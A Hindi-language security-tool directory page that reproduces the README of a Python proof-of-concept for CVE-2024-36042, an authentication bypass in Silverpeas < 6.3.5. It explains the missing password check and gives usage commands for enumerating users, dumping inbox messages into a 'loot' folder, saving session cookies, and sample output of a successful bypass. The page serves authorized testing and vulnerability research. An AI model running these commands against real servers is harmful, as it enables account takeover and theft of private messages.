Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Silverpeas-AuthBypass-CVE-2024-36042 — Silverpeas < 6.3.5 में CVE-2024-36042 प्रमाणीकरण बाईपास के लिए Python PoC। इसमें संस्करण पहचान, मल्टी-थ्रेडेड उपयोगकर्ता गणना, संदेश निष्कर्षण, और अधिकृत सुरक्षा परीक्षण के लिए संरचित रिपोर्टिंग शामिल है। | Kitploit
उपकरण/GitHubGitHub/ha5ant/silverpeas-authbypass-cve-2024-36042
प्रमाणीकरण और प्राधिकरणटोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगरेड टीमिंग

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
ha5ant/silverpeas-authbypass-cve-2024-36042

Silverpeas-AuthBypass-CVE-2024-36042

Silverpeas < 6.3.5 में CVE-2024-36042 प्रमाणीकरण बाईपास के लिए Python PoC। इसमें संस्करण पहचान, मल्टी-थ्रेडेड उपयोगकर्ता गणना, संदेश निष्कर्षण, और अधिकृत सुरक्षा परीक्षण के लिए संरचित रिपोर्टिंग शामिल है।

रिपॉजिटरी देखें
3 महीने पहलेअभी तक समीक्षित नहीं

Silverpeas-AuthBypass-CVE-2024-36042

Silverpeas < 6.3.5 में AuthenticationServlet में पासवर्ड सत्यापन की कमी के कारण होने वाले CVE-2024-36042 — एक प्रमाणीकरण बाईपास के लिए एक स्वच्छ, पेशेवर-ग्रेड Python3 प्रूफ-ऑफ-कॉन्सेप्ट।

Python 3.8+ License: MIT


अवलोकन

Silverpeas AuthenticationServlet POST बॉडी से Password पैरामीटर हटाए जाने पर भी एक लॉगिन अनुरोध स्वीकार कर लेता है, जिससे किसी भी ज्ञात उपयोगकर्ता नाम को प्रमाणित सत्र पहुँच प्रदान होती है। यह उपकरण एक मॉड्यूलर, थ्रेडेड एक्सप्लॉइट फ्रेमवर्क के माध्यम से उन्नत रिकॉनिसेंस, डेटा निष्कर्षण और पेशेवर रिपोर्ट जनरेशन के साथ इस भेद्यता को जिम्मेदारीपूर्वक प्रदर्शित करता है।

प्रभावित: Silverpeas < 6.3.5
CVE: CVE-2024-36042
GHSA: GHSA-qvh3-8c57-gp4m


विशेषताएँ


स्थापना

root@kitploit:~
git clone https://github.com/YOURNAME/Silverpeas-AuthBypass-CVE-2024-36042.git
cd Silverpeas-AuthBypass-CVE-2024-36042
pip install requests beautifulsoup4

उपयोग

त्वरित परीक्षण (अंतर्निहित उपयोगकर्ता सूची)

root@kitploit:~
python3 CVE-2024-36042.py -t http://TARGET:8080 --dump-messages

उन्नत रिपोर्टिंग (मार्कडाउन + कंसोल)

root@kitploit:~
python3 CVE-2024-36042.py -t http://TARGET:8080 -u admin --dump-messages --message-output both

फोरेंसिक निर्यात (प्रति संदेश अलग फ़ाइल)

root@kitploit:~
python3 CVE-2024-36042.py -t http://TARGET:8080 --userlist users.txt --dump-messages --message-output files --output-format md --outdir ./loot

केवल संस्करण जाँच (कोई शोषण नहीं)

root@kitploit:~
python3 CVE-2024-36042.py -t http://TARGET:8080 --check-version --no-exploit

प्रॉक्सी के माध्यम से कच्चे HTML लॉगिंग के साथ

root@kitploit:~
python3 CVE-2024-36042.py -t http://TARGET:8080 --proxy http://127.0.0.1:8080 --dump-messages --save-raw-html

आउटपुट प्रबंधन

यह उपकरण --message-output के माध्यम से डंप किए गए संदेशों के लिए चार प्रमुख आउटपुट मोड का समर्थन करता है:

  1. console (डिफ़ॉल्ट): कीवर्ड हाइलाइटिंग के साथ साफ किए गए संदेश सीधे टर्मिनल पर प्रिंट करता है।
  2. markdown: आउटपुट निर्देशिका में प्रति खाता एक एकल {username}_messages.md रिपोर्ट उत्पन्न करता है।
  3. files: प्रति खाता एक फ़ोल्डर बनाता है और प्रत्येक संदेश को एक अलग फ़ाइल के रूप में सहेजता है (जैसे, message_0006.md) फ़ाइल सिस्टम की सफल छँटाई के लिए शून्य-पैडेड आईडी के साथ।
  4. both: console और markdown मोड को जोड़ता है।

आर्टिफैक्ट संरचना

root@kitploit:~
outdir/
├── SilverAdmin/
│   ├── message_0001.md
│   ├── message_0002.md
│   ├── raw/ (वैकल्पिक: --save-raw-html)
│   │   └── msg_1.html
│   └── session_cookies.txt
├── scr1ptkiddy/
│   ├── messages.md
│   └── session_cookies.txt
└── summary.json

CLI संदर्भ

root@kitploit:~
-t, --target        Silverpeas का बेस URL (अनिवार्य)
-u, --user          लक्षित एकल उपयोगकर्ता नाम
--userlist          प्रति पंक्ति एक उपयोगकर्ता नाम वाली फ़ाइल
--dump-messages     इनबॉक्स संदेशों को स्क्रैप और प्रदर्शित करें
--max-id            जाँचने के लिए अधिकतम संदेश आईडी (डिफ़ॉल्ट: 50)
--threads           समवर्ती वर्कर्स (डिफ़ॉल्ट: 5)
--proxy             HTTP प्रॉक्सी URL
--message-output    आउटपुट मोड: {console, markdown, files, both}
--output-format     फ़ाइल प्रारूप: {md, txt}
--json              पूर्ण JSON रिपोर्ट निर्यात करें
--csv               स्क्रैप किए गए संदेशों का CSV निर्यात करें
--outdir            निर्यात के लिए आउटपुट निर्देशिका
--no-color          ANSI रंग आउटपुट अक्षम करें (लॉग के लिए उपयोगी)
--save-raw-html     डीबगिंग के लिए मूल HTML प्रतिक्रियाएँ सहेजें
--check-version     केवल संस्करण फिंगरप्रिंट करें
--no-exploit        शोषण छोड़ें (--check-version के साथ जोड़ें)
--quiet, -q         न्यूनतम आउटपुट
--no-banner         बैनर दबाएँ

आउटपुट उदाहरण

root@kitploit:~
[*] Target   : http://10.49.169.44:8080
[*] Version  : 6.3.1
[+] Version 6.3.1 < 6.3.5 - vulnerable.

[*] Trying: scr1ptkiddy
[+] BYPASSED -> scr1ptkiddy
[+] Data saved to ./scr1ptkiddy

────────────────────────────────────────────────────────────────────
  Execution Summary
────────────────────────────────────────────────────────────────────
┌───────────────┬──────────┬──────────┐
│ Account       │ Status   │ Messages │
├───────────────┼──────────┼──────────┤
│ scr1ptkiddy   │ SUCCESS  │ 6        │
│ admin         │ FAILED   │ 0        │
└───────────────┴──────────┴──────────┘

[+] JSON report -> ./report_20260516_013210.json

यह क्यों मौजूद है

यह रिपॉजिटरी मेरे आक्रामक-सुरक्षा पोर्टफोलियो का हिस्सा है। यह प्रदर्शित करता है:

  • भेद्यता अनुसंधान अनुवाद — एक प्रकट CVE को एक कार्यशील, विश्वसनीय एक्सप्लॉइट में बदलना।
  • उच्च-गुणवत्ता वाला टूलिंग — मजबूत त्रुटि प्रबंधन, बहुभाषी समर्थन, और संरचित आउटपुट प्रबंधन।
  • संचालनात्मक जागरूकता — यथार्थवादी वातावरण के लिए बहु-थ्रेडिंग, प्रॉक्सी समर्थन, और डिडुप्लीकेशन तर्क।
  • पेशेवर इंजीनियरिंग — स्वच्छ कोड आर्किटेक्चर, व्यापक दस्तावेज़ीकरण, और ऑपरेटर अनुभव (UX) पर ध्यान।

अस्वीकरण

यह उपकरण केवल अधिकृत सुरक्षा परीक्षण, अनुसंधान और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है। कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है। हमेशा उस बुनियादी ढाँचे का परीक्षण करने से पहले स्पष्ट अनुमति प्राप्त करें जो आपका नहीं है।


लाइसेंस

MIT

टूल डाउनलोड करें
विशेषताविवरण
संस्करण पहचानशोषण से पहले Silverpeas संस्करण और भेद्यता स्थिति का फिंगरप्रिंट लें।
बहु-थ्रेडेडThreadPoolExecutor के माध्यम से थ्रेड-सुरक्षित आउटपुट के साथ समवर्ती उपयोगकर्ता गणना।
उन्नत खोजबहु-भाषी (अंग्रेज़ी/फ़्रेंच) एंडपॉइंट खोज और बहु-आईडी प्रोबिंग।
डेटा निष्कर्षणडिडुप्लीकेशन और बॉयलरप्लेट फ़िल्टरिंग के साथ उच्च-निष्ठा संदेश डंपिंग।
लचीला आउटपुटकंसोल, मार्कडाउन रिपोर्ट और व्यक्तिगत फ़ाइल निर्यात (.md या .txt) के लिए समर्थन।
प्रॉक्सी और डीबगिंगBurp/ZAP के माध्यम से रूट करें (--proxy) और पार्सर डीबगिंग के लिए कच्चा HTML सहेजें।
स्वच्छ UXASCII सारांश तालिकाएँ, कीवर्ड हाइलाइटिंग, और वैकल्पिक ANSI रंग नियंत्रण।